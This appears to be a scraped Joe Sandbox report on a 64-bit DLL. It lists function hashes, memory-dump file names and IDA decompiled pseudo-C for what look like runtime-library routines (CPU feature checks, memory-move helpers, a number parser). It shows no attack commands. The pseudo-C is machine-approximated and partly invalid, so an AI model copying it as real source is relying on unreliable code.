Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
Instruction ID: 224c6f81855e22c7893a2b7f2b7cfff3a5734a3a9938c9b8f57012155b825125
Opcode Fuzzy Hash: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
Instruction Fuzzy Hash: 3041B1B090478E8BDF49CF68D84A5DE7BA0FB58348F104A1DEC66A6294D3B4D664CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E614 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
Instruction ID: 49a2f425b0a366156263d2a3b3444c35eadce35315b0c57ee30031dbbbdec485
Opcode Fuzzy Hash: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
Instruction Fuzzy Hash: FB41E6B090034A8BDF48DF68C88A5DE7FB1FB58358F10461DF85AA6390D37896A5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BE34 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
Instruction ID: d8d0a970803080bdb9b0c4b9adcb29ea95a621f075ad5d7819bf759c13dfa2c1
Opcode Fuzzy Hash: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
Instruction Fuzzy Hash: AE3105B090034A8BDB4CDF68C88A4DE3FA1BB58398F10461DFC5A9A350D3B4D9A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012110 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
Instruction ID: 8f5d51aba00c4f23d52c296157a313ffc4782a84c6f71662d1847f1d9af8e599
Opcode Fuzzy Hash: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
Instruction Fuzzy Hash: E431ADB55187818BC348DF28C54A51ABBE1FB8C308F504B2EF8CAA6294D778D6058B4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020D54 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
Instruction ID: f7e907a5a4d268517ac5d39fb781b2abcac55db7633d781cedf7f9941ca353e5
Opcode Fuzzy Hash: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
Instruction Fuzzy Hash: 8F21A0B152C781AFD388DF28C19981ABBE1FB88304F806A1DF98687350D374D844CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E828 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
Instruction ID: e563aa27f56e2ecce816434c0e114442c931e28e35474e2e86562d3eaff730a2
Opcode Fuzzy Hash: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
Instruction Fuzzy Hash: 8931707552D784AFC788DF28D48991EBBF0FB98345F906A1DF88686264E374D445CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015400 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
Instruction ID: aca377b28207093ad69189230e20808a2953a665cdfbd0516b7c3ce528793aa5
Opcode Fuzzy Hash: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
Instruction Fuzzy Hash: 7F2168B15187808BD348DF28D54951ABBE1BB8C30CF400B2DF8CAAA2A1D778D604CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FAB50 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00007FFA7FFA094FAB50(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x956f4f8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x94fabb1;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x956f4f8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x956f4f8 = r8d;
				 *0x956f4fc = r8d;
				return 0;
			}

0x7ffa094fab50
0x7ffa094fab56
0x7ffa094fab5b
0x7ffa094fab62
0x7ffa094fab62
0x7ffa094fab69
0x7ffa094fab6b
0x7ffa094fab73
0x7ffa094fab79
0x7ffa094fab7d
0x7ffa094fab83
0x7ffa094fab87
0x7ffa094fab91
0x7ffa094fab9b
0x7ffa094faba6
0x7ffa094fabaa
0x7ffa094fabb1
0x7ffa094fabbf

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
Instruction ID: 60ac1b4582f4f9e69cf940956cab96b08cd89b0bbc98d0b6c51e56764254626c
Opcode Fuzzy Hash: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
Instruction Fuzzy Hash: 96F06272B192969ADBA48F3AB842A2977D4E74C3C4FA0C079DA9D87F04D63C90648F14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F3240 Relevance: 55.8, APIs: 37, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA094F3240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _t207;
				intOrPtr* _t209;
				intOrPtr _t218;
				intOrPtr _t221;
				long long _t223;
				void* _t225;
				intOrPtr _t228;
				long long _t229;
				void* _t230;
				intOrPtr _t235;
				long long _t237;
				void* _t239;
				void* _t243;
				long long _t245;
				void* _t247;
				long long _t248;
				void* _t249;
				long long _t250;
				void* _t251;
				long long _t257;

				_t207 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F21F0(__eflags, __rax, _a8, _a16);
				E00007FFA7FFA094F21F0(__eflags, __rax, _a32, _a40);
				E00007FFA7FFA094F2400(__eflags, __rax, _a8, _a16, _a24);
				_a24 = _t207;
				E00007FFA7FFA094F2400(__eflags, _t207, _a32, _a40, _a48);
				_a48 = _t207;
				_t209 = 0xffffffff - _a48;
				_v120 = 0xffffffff;
				E00007FFA7FFA094F2170(_t209, _a8);
				_t211 =  *_t209 - _a24;
				if (_v120 - 0xffffffff > 0) goto 0x94f3315;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170( *_t209 - _a24, _a8);
				_v136 = 0xffffffff;
				E00007FFA7FFA094F2170( *_t211 - _a24 - _a16, _a8);
				_v128 = 0xffffffff;
				E00007FFA7FFA094F2170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
				if ( *0xffffffff - _v128 >= 0) goto 0x94f338e;
				r8d = 0;
				E00007FFA7FFA094F22B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
				_t218 = _a24;
				if (_a48 != _t218) goto 0x94f33ec;
				E00007FFA7FFA094F18D0(_t218, _a32);
				_v112 = _t218 + _a40;
				E00007FFA7FFA094F18F0(_t218 + _a40, _a8);
				E00007FFA7FFA094F1230(_t218 + _a40 + _a16, _v112, _a48);
				goto 0x94f3810;
				_t221 = _a32;
				if (_a8 == _t221) goto 0x94f34a2;
				E00007FFA7FFA094F18F0(_t221, _a8);
				_t223 = _t221 + _a16 + _a24;
				_v104 = _t223;
				E00007FFA7FFA094F18F0(_t223, _a8);
				_t225 = _t223 + _a16 + _a48;
				E00007FFA7FFA094F1230(_t225, _v104, _v136);
				E00007FFA7FFA094F18D0(_t225, _a32);
				_v96 = _t225 + _a40;
				E00007FFA7FFA094F18F0(_t225 + _a40, _a8);
				E00007FFA7FFA094F11E0(_t225 + _a40 + _a16, _v96, _a48);
				goto 0x94f3810;
				_t228 = _a24;
				if (_a48 - _t228 >= 0) goto 0x94f3558;
				E00007FFA7FFA094F18F0(_t228, _a8);
				_t229 = _t228 + _a40;
				_v88 = _t229;
				E00007FFA7FFA094F18F0(_t229, _a8);
				_t230 = _t229 + _a16;
				E00007FFA7FFA094F1230(_t230, _v88, _a48);
				E00007FFA7FFA094F18F0(_t230, _a8);
				_v80 = _t230 + _a16 + _a24;
				E00007FFA7FFA094F18F0(_t230 + _a16 + _a24, _a8);
				E00007FFA7FFA094F1230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
				goto 0x94f3810;
				_t235 = _a16;
				if (_a40 - _t235 > 0) goto 0x94f360e;
				E00007FFA7FFA094F18F0(_t235, _a8);
				_t237 = _t235 + _a16 + _a24;
				_v72 = _t237;
				E00007FFA7FFA094F18F0(_t237, _a8);
				_t239 = _t237 + _a16 + _a48;
				E00007FFA7FFA094F1230(_t239, _v72, _v136);
				E00007FFA7FFA094F18F0(_t239, _a8);
				_v64 = _t239 + _a40;
				E00007FFA7FFA094F18F0(_t239 + _a40, _a8);
				E00007FFA7FFA094F1230(_t239 + _a40 + _a16, _v64, _a48);
				goto 0x94f3810;
				_t243 = _a16 + _a24;
				if (_t243 - _a40 > 0) goto 0x94f36eb;
				E00007FFA7FFA094F18F0(_t243, _a8);
				_t245 = _t243 + _a16 + _a24;
				_v56 = _t245;
				E00007FFA7FFA094F18F0(_t245, _a8);
				_t247 = _t245 + _a16 + _a48;
				E00007FFA7FFA094F1230(_t247, _v56, _v136);
				E00007FFA7FFA094F18F0(_t247, _a8);
				_t248 = _t247 + _a40 + _a48 - _a24;
				_v48 = _t248;
				E00007FFA7FFA094F18F0(_t248, _a8);
				_t249 = _t248 + _a16;
				E00007FFA7FFA094F1230(_t249, _v48, _a48);
				goto 0x94f3810;
				E00007FFA7FFA094F18F0(_t249, _a8);
				_t250 = _t249 + _a40;
				_v40 = _t250;
				E00007FFA7FFA094F18F0(_t250, _a8);
				_t251 = _t250 + _a16;
				E00007FFA7FFA094F1230(_t251, _v40, _a24);
				E00007FFA7FFA094F18F0(_t251, _a8);
				_v32 = _t251 + _a16 + _a24;
				E00007FFA7FFA094F18F0(_t251 + _a16 + _a24, _a8);
				E00007FFA7FFA094F1230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
				_t257 = _a48 - _a24;
				_v24 = _t257;
				E00007FFA7FFA094F18F0(_t257, _a8);
				_t259 = _t257 + _a40 + _a48;
				_v16 = _t257 + _a40 + _a48;
				E00007FFA7FFA094F18F0(_t257 + _a40 + _a48, _a8);
				E00007FFA7FFA094F1230(_t259 + _a16 + _a24, _v16, _v24);
				return E00007FFA7FFA094F23A0(_t259 + _a16 + _a24, _a8, _v128);
			}

0x7ffa094f3240
0x7ffa094f3240
0x7ffa094f3245
0x7ffa094f324a
0x7ffa094f324f
0x7ffa094f326b
0x7ffa094f3280
0x7ffa094f329d
0x7ffa094f32a2
0x7ffa094f32c2
0x7ffa094f32c7
0x7ffa094f32d6
0x7ffa094f32de
0x7ffa094f32eb
0x7ffa094f32fb
0x7ffa094f3306
0x7ffa094f3310
0x7ffa094f331d
0x7ffa094f3338
0x7ffa094f3345
0x7ffa094f335d
0x7ffa094f336a
0x7ffa094f3377
0x7ffa094f3379
0x7ffa094f3389
0x7ffa094f338e
0x7ffa094f339e
0x7ffa094f33a8
0x7ffa094f33b5
0x7ffa094f33c2
0x7ffa094f33e2
0x7ffa094f33e7
0x7ffa094f33ec
0x7ffa094f33fc
0x7ffa094f340a
0x7ffa094f3417
0x7ffa094f341f
0x7ffa094f342c
0x7ffa094f3439
0x7ffa094f3451
0x7ffa094f345e
0x7ffa094f346b
0x7ffa094f3478
0x7ffa094f3498
0x7ffa094f349d
0x7ffa094f34a2
0x7ffa094f34b2
0x7ffa094f34c0
0x7ffa094f34c5
0x7ffa094f34cd
0x7ffa094f34da
0x7ffa094f34df
0x7ffa094f34fa
0x7ffa094f3507
0x7ffa094f351c
0x7ffa094f3529
0x7ffa094f354e
0x7ffa094f3553
0x7ffa094f3558
0x7ffa094f3568
0x7ffa094f3576
0x7ffa094f3583
0x7ffa094f358b
0x7ffa094f3598
0x7ffa094f35a5
0x7ffa094f35bd
0x7ffa094f35ca
0x7ffa094f35d7
0x7ffa094f35e4
0x7ffa094f3604
0x7ffa094f3609
0x7ffa094f3621
0x7ffa094f362c
0x7ffa094f363a
0x7ffa094f3647
0x7ffa094f364f
0x7ffa094f365c
0x7ffa094f3669
0x7ffa094f3681
0x7ffa094f368e
0x7ffa094f36b1
0x7ffa094f36b4
0x7ffa094f36c1
0x7ffa094f36c6
0x7ffa094f36e1
0x7ffa094f36e6
0x7ffa094f36f3
0x7ffa094f36f8
0x7ffa094f3700
0x7ffa094f3710
0x7ffa094f3715
0x7ffa094f3733
0x7ffa094f3740
0x7ffa094f3755
0x7ffa094f3765
0x7ffa094f378d
0x7ffa094f37a5
0x7ffa094f37a8
0x7ffa094f37b8
0x7ffa094f37c5
0x7ffa094f37cd
0x7ffa094f37dd
0x7ffa094f380b
0x7ffa094f3831

APIs

Part of subcall function 00007FFA094F21F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F2217

Part of subcall function 00007FFA094F2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F3310
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33A8
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33C2
char_traits.LIBCPMTD ref: 00007FFA094F33E2
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F342C
char_traits.LIBCPMTD ref: 00007FFA094F3451
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F345E

Part of subcall function 00007FFA094F18D0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18DE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3478
char_traits.LIBCPMTD ref: 00007FFA094F3498
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F340A

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F34C0
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F34DA
char_traits.LIBCPMTD ref: 00007FFA094F34FA
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3507
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3529
char_traits.LIBCPMTD ref: 00007FFA094F354E

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
String ID:
API String ID: 1550686663-0
Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction ID: bd6af4020072f200f0b1ea20aee84bb8cc730cfed14bc8f787f7053d90ea7420
Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction Fuzzy Hash: D9D19566A1DBC281DA70DF65F4A13AAB361FBCD784F008126DA8D53B6ADF2DD054CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F2FC0 Relevance: 15.1, APIs: 10, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FFA7FFA094F2FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				long long _t108;
				long long _t110;
				intOrPtr* _t112;
				intOrPtr _t116;
				long long _t118;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x94f303c;
				E00007FFA7FFA094F18F0(__rax, _a8);
				_t100 = _a32 - __rax;
				_v64 = _a40;
				_v72 = _t100;
				E00007FFA7FFA094F3240(__edx, E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
				goto 0x94f3214;
				E00007FFA7FFA094F21F0(E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
				E00007FFA7FFA094F2400(E00007FFA7FFA094F2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
				_a24 = _t100;
				_t102 = 0xffffffff - _a40;
				_v40 = 0xffffffff;
				E00007FFA7FFA094F2170(_t102, _a8);
				_t104 =  *_t102 - _a24;
				if (_v40 - 0xffffffff > 0) goto 0x94f30aa;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170(_t104, _a8);
				_v56 =  *_t104 - _a24 - _a16;
				_t108 = _a24;
				if (_a40 - _t108 >= 0) goto 0x94f3126;
				E00007FFA7FFA094F18F0(_t108, _a8);
				_t110 = _t108 + _a16 + _a24;
				_v32 = _t110;
				E00007FFA7FFA094F18F0(_t110, _a8);
				_t112 = _t110 + _a16 + _a40;
				E00007FFA7FFA094F1230(_t112, _v32, _v56);
				E00007FFA7FFA094F2170(_t112, _a8);
				_v48 =  *_t112 + _a40 - _a24;
				if (_a40 > 0) goto 0x94f3162;
				if (_a24 <= 0) goto 0x94f320f;
				r8d = 0;
				if ((E00007FFA7FFA094F22B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x94f320f;
				_t116 = _a40;
				if (_a24 - _t116 >= 0) goto 0x94f31d9;
				E00007FFA7FFA094F18F0(_t116, _a8);
				_t118 = _t116 + _a16 + _a24;
				_v24 = _t118;
				E00007FFA7FFA094F18F0(_t118, _a8);
				_t120 = _t118 + _a16 + _a40;
				E00007FFA7FFA094F1230(_t118 + _a16 + _a40, _v24, _v56);
				E00007FFA7FFA094F18F0(_t118 + _a16 + _a40, _a8);
				E00007FFA7FFA094F11E0(_t120 + _a16, _a32, _a40);
				return E00007FFA7FFA094F23A0(_t120 + _a16, _a8, _v48);
			}

0x7ffa094f2fc0
0x7ffa094f2fc5
0x7ffa094f2fca
0x7ffa094f2fcf
0x7ffa094f2fef
0x7ffa094f2ff6
0x7ffa094f3006
0x7ffa094f3011
0x7ffa094f3016
0x7ffa094f3032
0x7ffa094f3037
0x7ffa094f3046
0x7ffa094f305d
0x7ffa094f3062
0x7ffa094f3071
0x7ffa094f3079
0x7ffa094f3083
0x7ffa094f3093
0x7ffa094f309e
0x7ffa094f30a5
0x7ffa094f30af
0x7ffa094f30c7
0x7ffa094f30cc
0x7ffa094f30dc
0x7ffa094f30e3
0x7ffa094f30ed
0x7ffa094f30f5
0x7ffa094f30ff
0x7ffa094f3109
0x7ffa094f3121
0x7ffa094f312b
0x7ffa094f3143
0x7ffa094f3151
0x7ffa094f315c
0x7ffa094f3162
0x7ffa094f3179
0x7ffa094f317f
0x7ffa094f318f
0x7ffa094f3196
0x7ffa094f31a0
0x7ffa094f31a8
0x7ffa094f31b2
0x7ffa094f31bc
0x7ffa094f31d4
0x7ffa094f31de
0x7ffa094f31fb
0x7ffa094f3218

APIs

Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F226B
Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F2FF6

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Part of subcall function 00007FFA094F3240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F3310
Part of subcall function 00007FFA094F3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33A8
Part of subcall function 00007FFA094F3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33C2
Part of subcall function 00007FFA094F3240: char_traits.LIBCPMTD ref: 00007FFA094F33E2

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F30A5
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F30E3
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F30FF
char_traits.LIBCPMTD ref: 00007FFA094F3121
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3196
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F31B2
char_traits.LIBCPMTD ref: 00007FFA094F31D4
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F31DE
char_traits.LIBCPMTD ref: 00007FFA094F31FB

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
String ID:
API String ID: 4284633421-0
Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction ID: 4a0469f42dad977e0036629afcd00868c10ecd032e8c0613f23a0a0e309ca1cc
Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction Fuzzy Hash: 9751BF26A1CA8286DA60DF79F45136AA3A0FBC97C4F105136EBDD83B69DF2DD451CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F893C Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FFA7FFA094F893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				void* _t155;
				void* _t185;
				signed short _t199;
				signed short _t200;
				signed int _t201;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed short* _t380;
				signed short* _t381;
				signed short* _t382;
				signed short* _t384;
				signed short** _t385;
				long long _t386;
				long long* _t389;
				signed short* _t390;
				long long* _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				long long _t406;
				signed short* _t407;
				long long _t408;
				intOrPtr _t409;

				_t403 = __r8;
				_t394 = __rdx;
				_t386 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t406 =  *((intOrPtr*)(__rdx));
				r13d = 0;
				_t255 = r9b & 0xffffffff;
				r14d = r8d;
				_v64 = _t406;
				_t397 = __rdx;
				if (_t406 != 0) goto 0x94f8987;
				E00007FFA7FFA094FB420(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA094F9744();
				goto 0x94f89b9;
				if (r14d == 0) goto 0x94f89d1;
				_t4 = _t403 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0x94f89d1;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t408;
				E00007FFA7FFA094F9674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t389 = _t397[1];
				if (_t389 == 0) goto 0x94f901d;
				 *_t389 =  *_t397;
				goto 0x94f901d;
